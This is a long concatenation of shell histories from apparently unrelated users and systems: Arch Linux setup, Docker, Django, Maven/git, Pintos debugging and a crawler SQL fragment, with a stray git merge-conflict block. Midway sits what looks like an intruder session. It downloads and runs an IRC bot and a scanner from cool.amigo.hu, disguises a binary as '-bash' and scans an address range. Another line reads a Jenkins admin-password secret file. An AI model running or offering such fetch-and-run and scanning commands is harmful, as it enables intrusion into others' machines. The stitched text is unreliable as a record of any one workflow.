', 'a:1:{i:0;a:2:{s:3:\"url\";s:180:\s.kr//board/download.do?boardId=BBS_0000001&menuCd=MCD_000000000000042367&orderBy=REGISTER_DATEDESC&startPage=1&dataSid=15336639&command=update&fileSid=8395505\";s:4:\"name\";s:84:\"NEW : 제16기글로벌역사외교대사모집및발대식개최계획.hwp (36 kb)\";}}', '0', 'BBS_0000001', '15336639', '2016-07-19', '18558', '0', 'Yangs Crawler V1') +php getNotice.php 0 +php getNotice.php 1 18441 +l +ls +ls +php getNoticeType1.php 0 19405 +php getNoticeType1.php 1 19405 +php getNoticeType1.php 1 19261 +php getNoticeType1.php 0 19261 +php getNoticeType2.php 0 22242 +php getNoticeType3.php 0 22242 +php getNoticeType4.php 0 22242 +php getNoticeType5.php 0 22242 +php getNoticeType6.php 0 22242 +php getNoticeType7.php 0 22242 +php getNoticeType1.php 0 22242 +php getNoticeType2.php 0 22242 +php getNoticeType3.php 0 22242 +ls +ls +php getNotice.php 1 18407 +php getNoticeType1.php 19261 +php getNoticeType1.php 0 19261 +php getNoticeType1.php 1 19261 +php getNoticeType1.php 1 18529 +ls +ls +php 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. +docker run --rm -ti alpine /bin/sh +docker build . +docker build --no-cache . +docker run --rm -ti alpine /bin/sh +docker images +docker build --no-cache . +docker run --rm -ti alpine /bin/sh +docker images +docker images +docker run --rm -ti -v .:/home alpine /bin/sh +docker run --rm -ti -v ./:/home alpine /bin/sh +docker run --rm -ti -v .:/home alpine /bin/sh +exit +docker-tray +docker stat +docker stats +htop +docker run --rm -ti -v .:/home alpine /bin/sh +docker build . +htop +htop +htop +ls /etc/grub.d/ +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +reboot +dmesg | grep microcode +poweroff +htop +conky +man xsetroot +xsetroot --version +xsetroot -solid "#2F343F" +usermod -aG log vladimir +sudo usermod -aG log vladimir +htop +pkill conky +pkill conky +pkill conky +conky +conky +conky +nitrogen --set-scaled ~/background.jpg +xsetroot -solid "#2F343F" +man nitrogen +nitrogen --set-color "#2F343F" +nitrogen --set-color="#2F343F" +nitrogen --set-color=2F343F +man nitrogen +nitrogen --set-scaled --set-color=2F343F +nitrogen --set-color="2F343F" +hsetroot -solid "#2F343F" +pkill conky +htop +startx +startx +startx +startx +startx +htop +cpu cpu0 +mpstat | grep 'all' +docker -h +docker stats +docker stats +htop +htop +synclient -l +synclient TapButton1=1 +synclient TapButton3=1 +systemctl logout +logout +systemctl exit +synclient TapButton1=1 +statx +startx +exit +pkill pa-applet +pkill xfce4-power-manager +xfce4-power-manager +xprop +xprop +xprop +startx +startx +sudo gedit /boot/grub/grub.cfg +grub-mkconfig +sudo grub-mkconfig +reboot +sudo grub-mkconfig +sudo gedit /boot/grub/grub.cfg +sudo update-grub +wmtime +orage +lalcal +buici-clock +plasma5-applets-analog24hclock +transparent-clock +grdc +talking-clock +talking-clock +alltray -h +alltray +lalcal +alltray lalcal +docker stats +sudo gedit +sudo gedit /etc/X11/xorg.conf.d/00-keyboard.conf +sudo gedit /etc/X11/xorg.conf.d/00-keyboard.conf +setxkbmap -layout "us, ru" -option "grp:alt_shift_toggle" +setxkbmap -layout "us, ru" -option "grp:alt_shift_toggle" +exit +setxkbmap -layout "us, ru" -option "grp:alt_shift_toggle" +synclient TapButton3=3 +synclient TapButton2=2 +xbacklight +xprop +yaourt -S opera --noconfirm +yaourt -S opera +pacman -S opera +sudo pacman -S opera +sudo pacman -Suyy +sudo pacman -Suyy +sudo pacman -Suy +sudo pacman -S opera +sudo pacman -S opera +sudo pacman -Suy +sudo pacman -Suy +sudo pacman -Suy +reflector --verbose --latest 100 --sort rate --save /etc/pacman.d/mirrorlist +sudo reflector --verbose --latest 100 --sort rate --save /etc/pacman.d/mirrorlist +pacman -Syyu --noconfirm +sudo pacman -Syyu --noconfirm +sudo pacman -S opera +nano /etc/pacman.d/mirrorlist +node -v +platformio +node -v +pio --help +code /data/projects/platformio-test +node -v +node -v +npm -v +nvm -v +nvm -v +echo 'source /usr/share/nvm/init-nvm.sh' >> ~/.bashrc +firefox-quantum +htop +mc +mc +mc +mc +mc +startx +firefox-quantum +firefox-quantum +yaourt -Suyy firefox-quantum +yaourt -Suyy firefox-quantum --noconfirm +yaourt -S firefox-quantum --noconfirm +firefox-quantum +synclient -l +xdpyinfo | grep -B2 resolution +xrandr --dpi +xrandr +xrandr --dpi 96 +xrandr --dpi 144 +xrandr --dpi 200 +xrandr +cat ~/arandr.sh +xrandr --output VIRTUAL1 --off --output LVDS1 --primary --mode 2048x1200 --pos 0x0 --rotate normal --output VGA1 --off +xrandr LVDS1 --dpi 48 +xrandr --output LVDS1 --dpi 48 +xrandr --output LVDS1 --dpi 48x48 +touchegg -v +cp /usr/share/touchegg/touchegg.conf /home/vladimir/.config/touchegg/touchegg.conf +touchegg +touchegg +touchegg +touchegg +xrandr --output LVDS1 --dpi 96x96 +code -v +modprobe cp210x +sudo modprobe CP210X +sudo modprobe cp210x +uname +uname -r +uname -r +uname -r +uname -r +modprobe cp210x +sudo modprobe cp210x +hdparm +sudo hdparm -t /dev/sda +mingetty +systemctl edit getty@tty1 +sudo systemctl edit getty@tty1 +cp /usr/lib/systemd/system/getty@.service /etc/systemd/system/autologin@.service +sudo cp /usr/lib/systemd/system/getty@.service /etc/systemd/system/autologin@.service +sudo nano /etc/systemd/system/autologin@.service +sudo nano /etc/systemd/system/getty@tty1.service.d/override.conf +man mingetty +mingetty --delay 5 +ranger +cp ~/.config/ranger/rc.conf +mkdir ~/.config/ranger +ls ~/.config/ranger +ls -l ~/.config/ranger +cp ~/.config/ranger/rc.conf +touch ~/.config/ranger/rc.conf +ranger +ranger +node -v +nvm list +node -v +nvm install 8 +node +node -v +lscpu +iotop +git clonescm/hc/pos-datamanagement-ui.git +git clonescm/hc/pos-datamanagement-ui.git +npm i +npm i +npm start +docker-comose up --build dm-ui +docker-compose up --build dm-ui +docker-compose up --build dm-ui +ranger +docker -v +docker ps +docker images +docker-compose up --build dm-ui +docker-compose up --build dm-ui +docker-compose up --build dm-ui +docker build . +docker images +docker run --rm -ti posdatamanagementui_dm-ui /bin/sh +docker build . +docker run --rm -ti posdatamanagementui_dm-ui /bin/sh +docker images +docker build . --name test +docker build --help +docker build -t ui . +docker run --rm -ti ui /bin/sh +docker run --rm -ti ui #/bin/sh +docker run --rm -ti ui sh +docker build -t ui . +docker run --rm -ti node:8.4.0-alpine /bin/sh +docker run --rm -ti alpine /bin/sh +docker build -t ui . + +docker build -t --no-cache ui . +docker build -t ui . +docker build -t ui . +docker build -t ui . +docker run --rm -ti ui /bin/bash +docker run --rm -ti node:8.4.0 /bin/bash +docker images +docker run --rm -ti node:8.4.0 /bin/bash +docker run --rm -ti node:8.4.0 bash +docker run --rm -ti node:8.4.0 #!/bin/bash +time npm start +time npm start +yaourt -Suyy +yaourt -S tano +yaourt -S tano --noconfirm +n +lx -l +ls -l +exit +node -v +npm i +npm run test +pacman -S uxvrt +sudo pacman -S uxvrt +ajaxterm +qterminal +xterm +tmux +htop +yaourt -S acestream-engine-i686 +yaourt -S acestream-engine-i686 --no-confirm +yaourt -S acestream-engine-i686 --noconfirm +mono -v +popcorntime +yaourt -S noxbit --noconfirm +yaourt -Suyy +yaourt -S noxbit --noconfirm +yaourt -S noxbit --noconfirm +htop +yaourt -S networkmanager-l2tp +yaourt -Suyy +yaourt -S networkmanager-l2tp +gpg +gpg --recv-keys +yaourt -S networkmanager-l2tp +gpg --recv-keys 49A7787EF8D3C039 +yaourt -S networkmanager-l2tp +yaourt -S libnm-gtk +yaourt -S networkmanager-l2tp +yaourt -S networkmanager-l2tp --noconfirm +libnm-gtk -v +route +ping www.google.com +ssh -v +ssh -v +ssh vadim@ +ssh vadim@ +ssh vadim@ +ssh vadim@ +man tmux +echo $SHELL +zsh +cat ~/.bashrc +cat ~/.zshrc +zsh +cat ~/.zshrc +zsh +zsh +zsh +htop +cat ~/.zshrc +mc +mkdir ~/.zsh/plugins +mc +mkdir ~/.zsh +mkdir ~/.zsh/plugins +mkdir ~/.zsh/plugins/zsh-autosuggestions +cp source /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh +cp /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh ~/.zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh +nano ~/.zshrc +zsh +find / --name zshrc.sh +find / -name zshrc.sh +sudo find / -name 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+git clonestall +bash yaourt.sh +ls -la +makepkg -s --noconfirm + sudo pacman -U --noconfirm $(ls -la | grep pkg.tar) +ls -la +sudo pacman -U package-query-1.9-2-x86_64.pkg.tar.xz +package-query -v +git clone +git clone +makepkg -s --noconfirm +sudo pacman -U yaourt-1.9-1-any.pkg.tar.xz +rm -rf package-query/ yaourt/ +ls -la +bash desktop.sh +bash soft.sh +bash dotfiles.sh +chsh -l +chsh -s /bin/zsh +reboot +<<<<<<< HEAD +sudo systemctl start dhcpcd +ping +ls -la +bash yaourt.sh +sudo nano yaourt.sh +ls -la +rm -rf package-query/ +bash yaourt.sh +ls -la +yaourt -v +yaourt --version +bash desktop.sh +nano desktop.sh +bash desktop.sh +bash soft.sh +nano soft.sh +bash soft.sh +bash dotfiles.sh +sudo reboot +docker -v +docker ps +$SHELL +echo $SHELL +shutter -v +sudo echo $USER +sudo chsh -s /bin/zsh $USER +echo $SHELL +bash soft.sh +sudo gpasswd -a ${USER} docker +sudo systemctl enable docker +======= +sudo sysctl start dhcpcd +sudo sysctl start dhcpcd +sudo systemctl start dhcpcd +ping +ping +sudo pacman -S git +git clonestall.git +bash yaourt.sh +yaourt --version +sh desktop.sh +bash soft.sh +sh dotfiles.sh +sudo reboot +>>>>>>> 7b61fa9d374058863d3761b594e9b81df7b9586f +sudo cat /var/jenkins_home/secrets/initialAdminPassword +cat /var/jenkins_home/secrets/initialAdminPassword +ls +ls +ls +ls +exit +ls +ls +ls +exit +w +ftp +nano index.js +node index.js +clone +git init +git cloneshmichael228/CS424-project +pip instal +pip install --upgrade pip +$ pip install django-extensions +init git +git init +$ conda create -n djangodev +conda create -n djangodev +conda install django +django-admin startproject EstateAgent +sed -i "s/ALLOWED_HOSTS = \[\]/ALLOWED_HOSTS = \['jupyter.nuigalway.ie'\]/" greeter/settings.py +sed -i "s/ALLOWED_HOSTS = \[\]/ALLOWED_HOSTS = \['jupyter.nuigalway.ie'\]/" EstateAgent/settings.py +python manage.py runserver +sed -i "s/ALLOWED_HOSTS = \[\]/ALLOWED_HOSTS = \['jupyter.nuigalway.ie'\]/" EstateAgent/settings.py +python manage.py runserver +python manage.py runserver +python manage.py runserver +django-admin startproject clubsite +python manage.py makemigrations +python manage.py migrate +python manage.py createsuperuser +python manage.py runserver +sed -i "s/ALLOWED_HOSTS = \[\]/ALLOWED_HOSTS = \['jupyter.nuigalway.ie'\]/" EstateAgent/settings.py +python manage.py runserver +python manage.py migrate +python manage.py runserver +python manage.py migrate +python manage.py runserver +python manage.py migrate +python manage.py migrate +python manage.py migrate +python manage.py migrate +sed -i "s/ALLOWED_HOSTS = \[\]/ALLOWED_HOSTS = \['jupyter.nuigalway.ie'\]/" EstateAgent/settings.py +python manage.py runserver +python manage.py migrate +python manage.py runserver +python manage.py makemigrations +python manage.py runserver +python manage.py migrate +python manage.py runserver +python manage.py migrate +python manage.py makemigrate +python manage.py makemigrations +python manage.py runserver +python manage.py shell +python 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+apt-cache search git-core +sudo apt-get install git-core +exit +apt-cache search mercurial bazaar +apt-cache search bazaar +sudo apt-get install bzr +apt-get install mercurial +apt-cache search mercurial +sudo apt-get install mercurial +exit +sudo apt-get install libapache2-mod-wsgi +sudo pacman-mirrors -i -c China rank +sudo pacman-mirrors -i -c China -m rank +vim /etc/pacman.conf +sudo vim /etc/pacman.conf +sudo pacman -Syy +sudo pacman -Syu +sudo pacman -S archlinuxcn-keyring +sudo pacman -Sy +sudo vim /etc/pacman.conf +sudo pacman -Sy +sudo vim /etc/pacman.conf +sudo pacman -Sy +sudo pacman-mirrors -g +sudo pacman -Sy +sudo vim /etc/pacman.conf +sudo pacman-mirrors -g +sudo pacman -Sy +sudo pacman -Syyu +sudo vim /etc/pacman.conf +sudo pacman -Syyu +sudo vim /etc/pacman.conf +sudo pacman -Syyu +sudo pacman -S archlinuxcn-keyring +sudo pacman -S nvidia +vim .i3/config +ps -ef| grep systen-set +ps -ef| grep system-set +kill -9 12884 17989 +ps -ef| grep system-set +kill -9 system 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alecs +rm -rf alecs.tgz +ls -a +cat .bash_history +wget cool.amigo.hu/teambot.tar.gz +tar xvzf teambot.tar.gz +./-bash +ls -a +ps -x +wget cool.amigo.hu/scan.tar.gz +tar xvzf scan.tar.gz +./a +./a 1 +screen +wget cool.amigo.hu/screen.tgz +tar xvzf screen.tgz +chmod +x screen +./screen +./a 61.129 +./a 61.129 +rm -rf userstore-link-TEST/ +ls -las +git status +git commit -am "removing dirs" +ls +pwd +ls +more simplelink.iml +ls +ls +ls +ls +ls +ls +ls +ls +ls +mkdir war +ls +ls +mkdir WEB-INF +ls +mv applicationContext.xml web.xml ./WEB-INF/ +ls +ls +ls +ls +ls +more pom.properties +ls +ls +ls +ls +ls +ls +ls -las +git status +ls +ls -las +ls +more .gitignore +ls +git status +git add . +git status +ls +git commit -am "First successful build of SimpleLink war" +git push origin new-maven-structure +git status +git commit -am "Fixing parent config in module poms" +git push origin new-maven-structure +git status +git commit -am "Making RPM an on-demand build" +ls +ls +ls +ls +more com.symplified.singlepoint.AppTest.txt +more TEST-com.symplified.singlepoint.AppTest.xml +ls +c d../ +ls +ls +ls +ls +ls +ls +ls +open TEST-com.symplified.singlepoint.AppTest.xml +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +more cobertura.ser +ls +ls +ls +ls +open index.html +ls +more license-vagrant-vmware-fusion.lic +ls -las +vagrant plugin list +ls +rm license-vagrant-vmware-fusion.lic +rm LICENSE +cp -R "/Library/Preferences/VMware\ Fusion/license-fusion-50-e1-201202" ./ +cp -R /Library/Preferences/VMware\ Fusion/license-fusion-50-e1-201202 ./ +ls +more license-fusion-50-e1-201202 +chmod 777 license-fusion-50-e1-201202 +ln -s ./license-fusion-50-e1-201202 license-vagrant-vmware-fusion.lic +ls -las +vagrant help +VAGRANT_LOG=INFO vagrant help +vagrant box list +ls +ls +svn stat +svn stat +ls +git clone git@github.symplified.net:Symplified/symplified-main.git +ls +ls +git status +git checkout +git status +git checkout -b mgile-maven-experimental +git commit -am "branching" +git push origin mgile-maven-experimental +ls +ls +ls +more bootstrap_build.sh +ls +more build_functions.sh +ls +more local_dependencies.sh +ls +more bootstrap_build.sh +ls +em build_functions.sh +ls +ls +ls +git clone git@github.symplified.net:mgile/multi-module-test.git +ls +git checkout -b new-maven-structure +git push origin new-maven-structure +ls +mkdir -p singlepoint +ls +ls +mkdir studio +mkdir identity-router +mkdir login-server +mkdir idr-controller +ls +ls +mkdir -p shared +ls +ls +ls +cp -R ./singlepoint/ ./ +ls +ls +rm -rf ./* +ls +ls +ls +ls +touch ./pom.xml +ls +mv idr-controller/ identity-router-controller +ls +rm -rf identity-router identity-router-controller/ login-server/ shared/ singlepoint/ studio/ +ls +rm pom.xml +ls +ls +ls +ls +ls +git pull origin master +ls +git status +rm -rf ./SimpleLink/.idea/ +rm -rf ./SimpleLink/simplelink.iml +ls +ls +more pom.xml +emn pom.xml +pwd +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +more InsecureTrustManager.java +ls +ls +ls +ls +ls +ls +cp -R ./WEB-INF/ ~/dev/symplified/egithub/multi-module-test/singlepoint/simplelink/war/ +ls +ls +ls +ls +more known_hosts +lscd +more .aliases + +man hdiutil +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +more sonar-project.properties +cat ~/.ssh/id_rsa.pub | pbcopy +ssh buildmaster@ +ssh buildmaster@ +dig buildmaster.symplified.net +nslookup buildmaster.symplified.net +nslookup buildmaster.dev.symplified.net +ls +git status +git add singlepoint/simplelink/src/main/resources/ +git status +git commit -am "Adding resources directory" +git push origin new-maven-structure +ls +ls +touch README.md +git commit -am "README.md" +git push origin new-maven-structure +git add README.md +git commit -am "README.md" +git push origin new-maven-structure +emn README.md +more ../README.md +ls +git status +git commit -am "Test text" +git push origin new-maven-structure +git commit -am "Adding overview text" +git push origin new-maven-structure +git commit -am "" +git commit -am "changing headers to h2" +git push origin new-maven-structure +git status +ls +ls +git status +git push origin mgile-maven-experimental +ls +em init.el +emn +emd +emn +ls +ls +mkdir -p github +ls +git clone git@github.com:SympEng/test-repo.git +echo "hello world" > testfile.txt +more testfile.txt +ls +mv testfile.txt ./test-repo/ +ls +ls +git status +git add testfile.txt +git commit -am "DVCS-1 Adding test file with hello world text" +git push origin master +git checkout -b test-test +nano testfile.txt +git status +git commit -am "DVCS-2 Adding test-test branch and modifying testfile" +git push origin test-test +emn +emd +emn +ls +ls /dev/disk1s1 +which dd +sudo dd if=./ubuntu-12.10-desktop-amd64.iso of=/dev/disk1s1 +sudo dd if=./ubuntu-12.10-desktop-amd64.iso of=/dev/disk1s1 +sudo dd if=./ubuntu-12.10-desktop-amd64.iso of=/dev/disk1s1 +hdiutil convert-format UDRW -o ./ubuntu-12.10-desktop-amd64.img ubuntu-12.10-desktop-amd64.iso +hdiutil convert -format UDRW -o ./ubuntu-12.10-desktop-amd64.img ubuntu-12.10-desktop-amd64.iso +ls +ls -lasF +mv ubuntu-12.10-desktop-amd64.img.dmg ubuntu-12.10-desktop-amd64.img +ls -las +diskutil -h +diskutil +diskutil list +diskutil unmountDisk /dev/disk1s1 +sudo dd if=ubuntu-12.10-desktop-amd64.img of=/dev/rdisk1s1 bs=1m +diskutil eject /dev/disk1s1 +sudo dd if=ubuntu-12.10-desktop-amd64.iso of=/dev/rdisk1s1 bs=1m +diskutil eject /dev/disk1s1 +diskutil unmountDisk /dev/disk1s1 +sudo dd if=ubuntu-12.10-desktop-amd64.iso of=/dev/disk1s1 +hdiutil convert -format UDRW -o ./ubuntu-12.10-desktop-amd64.img ubuntu-12.10-desktop-amd64.iso +ls +diskutil list +sudo dd if=./ubuntu-12.10-desktop-amd64.img.dmg of=/dev/rdisk1 bs=1m +ifconfig +ls +jar -h +mkdir gconn +cp ../googleapps-connector- ./ +ls +jar -x googleapps-connector- +ls +ls -las +jar -xv googleapps-connector- +jar -t googleapps-connector- +ls -las +unzip googleapps-connector- +ls +ls +ls +emn GoogleAppsConnector.java +emd +emn GoogleAppsConnector.java +ls +ls +git status +ifconfig +nslookup github.symplified.net +nano ~/.aliases +ls ~/.ssh +nano ~/.aliases +source ~/.aliases +nano ~/.aliases +source ~/.aliases +oam-ec2 +telnet 443 +ls +ls +ls +git status +ls +ls +git clone git@github.symplified.net:Symplified/xamarin-component.git +ls +ls +more .gitignore +ls +ls +rm -rf Symplified.Auth/ +ls +ls +ls +ls +ls +cp ~/Downloads/mgile.pem ./mgile-symplified-aws.pem +ls +ls -las +chmod 600 mgile-symplified-aws.pem +ls -las +ssh -i mgile-symplified-aws.pem root@ec2-54-234-219-12.compute-1.amazonaws.com +ssh -i mgile-symplified-aws.pem ec2-user@ec2-54-234-219-12.compute-1.amazonaws.com +nano ~/.aliases +source ~/.aliases +oam-ec2 +ls -A +vi . +zsh +sudo apt install zsh +ls -A +vi .sudo_as_admin_successful +zsh +exit +zsh +vi .bashrc +echo $SHELL +which zsh +which bash +$zsh +exit +printenv +env +clear +env +cat env +echo env >> .defaultenv +cat .defaultenv +echo "${env}" >> .defaultenv +cat .defaultenv +rm -f .defaultenv +echo ${printenv} +echo ${"printenv"} +echo $"{printenv}" +echo "${printenv}" +echo "${$printenv}" +echo $printenv +echo (printenv) +echo printenv +echo 'printenv' +echo "printenv" +print | cat +printenv | cat +clear +printenv | echo +printenv | cat > .defaultenv +cat .defaultenv +clear +which +type -a +echo $SHELL +exit +echo $SHELL +vi .profile +vim thread.h +vim frame.c +rm .frame.c.swp +vim frame.c +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +backtrace 0xc002ab92 0xc002e4fc 0xc002eb52 0xc0032034 0xc00321c3 0xc002f1c1 0xc00221c5 0xc002241d 0x80482fd 0x8048111 0x8048a94. +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -v -k -T 60 -j 1 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -v -k -T 60 -j 20 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +maek +make +pintos --gdb -j 1 -v -k -T 60 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +clear +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -ul=25 -q -f run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -ul=25 -q -f run page-parallel +pintos -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k --bochs -j 1 --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +backtrace Call stack: 0xc002ab92 0xc002e4fc 0xc002ea51 0xc0032179 0xc00321c3 0xc002f1c1 0xc00221c5 0xc002241d 0x8048175 0x8048a94. +make +pintos -v -k --bochs -j 1 --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +ls +vim swap.c +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +clear +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +vim swap.c +ls +vim exception.c +ls +ls +vim process.c +vim exception.c +git add . +git status +git commit -m "page-linear" +git push +clear +ls +make +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +quit +clear +ls +vim child-linear.c +vim pagedir.c +ls +vim page-linear.c +vim page-parallel.c +ls +vim child-linear.c +vim page-parallel.c +make +clear +pintos -v -k -T 300 --qemu --filesys-size=2 -p tests/vm/page-linear -a page-linear --swap-size=4 -- -q -f -ul=15 run page-linear +make +clera +clear +pintos -v -k -T 300 --qemu --filesys-size=2 -p tests/vm/page-linear -a page-linear --swap-size=4 -- -q -f -ul=15 run page-linear +make +pintos -v -k -T 300 --qemu --filesys-size=2 -p tests/vm/page-linear -a page-linear --swap-size=4 -- -q -f -ul=15 run page-linear +make +pintos -v -k -T 300 --qemu --filesys-size=2 -p tests/vm/page-linear -a page-linear --swap-size=4 -- -q -f run page-linear +make check +clear +vim swap.c +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +backtrace 0xc002ab92 0xc0023437 0xc002f17f 0xc00221c5 0xc002241d 0xc0023162 0xc0023674 0xc002f1aa 0xc00221c5 0xc002241d 0xc0023162 0xc0023674 0xc0026ed9 0xc0025dc5 0xc0026550 0xc0025dc5 0xc0032423 0xc003213b 0xc00321c3 0xc002f1c1 0xc00221c5 0xc002241d 0x804aa98 +clear +vim frame.c +vim frame.c +vim frame.h +vim swap.c +vim frame.c +vim frame.h +make +vim page.h +make +clear +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023e3b 0xc0023e96 0xc002e4bd 0xc002d95e 0xc00211c4 0xc002f654 0xc002fc7a 0xc00221c5 0xc002241d 0x804ac34ption +make +0xc002ab92: debug_panic (.../../lib/kernel/debug.c:38) +0xc0023e3b: palloc_free_multiple (..../../threads/palloc.c:141) +0xc0023e96: palloc_free_page (..../../threads/palloc.c:149) +0xc002e4bd: pagedir_destroy (.../../userprog/pagedir.c:42) +0xc002d95e: process_exit (...../userprog/process.c:321) +0xc00211c4: thread_exit (..../../threads/thread.c:307) +0xc002f654: sys_exec (.../../userprog/syscall.c:95) +0xc002fc7a: syscall_handler (...../userprog/syscall.c:336) +0xc00221c5: intr_handler (..../threads/interrupt.c:367) +0xc002241d: intr_entry (threads/intr-stubs.S:38) +0x804ac34ption: (unknown) +clear +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 20 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 100 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 50 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k -j 4 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k -j 5 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k -j 200 --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 300 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 200 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +make +clear +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=25 run page-parallel +pintos -j 20 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear 